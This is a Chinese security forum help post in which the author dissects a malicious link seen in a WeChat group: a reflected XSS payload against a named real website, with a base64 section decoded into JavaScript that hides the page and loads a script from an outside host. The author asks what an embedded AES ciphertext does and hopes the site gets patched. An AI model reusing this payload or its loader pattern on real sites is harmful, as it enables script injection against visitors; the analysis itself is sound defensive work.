-
-
未解决
[求助]一个xss攻击样本中,代码的作用求解
-
发表于:
2020-11-16 09:51
1618
-
未解决 [求助]一个xss攻击样本中,代码的作用求解
在微信群里看到一个连接,链接:
1 | https: / / www.qufair.com / public / login / pintb / daqin33?ref = https % 3A % 2F % 2Fwww .qufair.com % 2Fconvention % 2F5880 .shtml520 % 27 % 7D ) % 7D ;new % 20Function (atob( % 60ZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmhpZGRlbj0xO3Y9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7di5zcmM9Ii8vejIuZHVveGouY29tL3giK3dpbmRvdy5sb2NhdGlvbi5zZWFyY2g7ZG9jdW1lbnQuaGVhZC5hcHBlbmRDaGlsZCh2KTt0aHJvdyAw % 60 ))(); if ( 0 ) % 7B $( % 7B / / &U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt =
|
第一部分 创建个函数然后跳转
1 2 3 4 5 6 7 | (function anonymous() {
document.documentElement.hidden = 1 ;
v = document.createElement( "script" );
v.src = "//z2.duoxj.com/x" + window.location.search;
document.head.appendChild(v);
throw 0
})
|
但是第二部分中
1 | if ( 0 ){$({ / / &U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt =
|
按我理解是一个不调用的闭合函数, 但中间有段aes加密的密文
1 | U2FsdGVkX180FTUqTVJy7BJ9lnVl1cv1CAWkGdtwSS5QHjsYErMyCGoEerd2w9wfGmrIFz5izzdsgbfh2BLiU6YQzzdsgbfh2F5Pn4YX92Q4BVKxpWyADVVABvgGvA3kxzzdsgbfh2BOTwJZluQLqYgW6bt =
|
求教这个干嘛用的,有点逼死强迫症的感觉
(地址没隐藏,希望能联系上这个站点管理员的让补下漏洞吧)
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)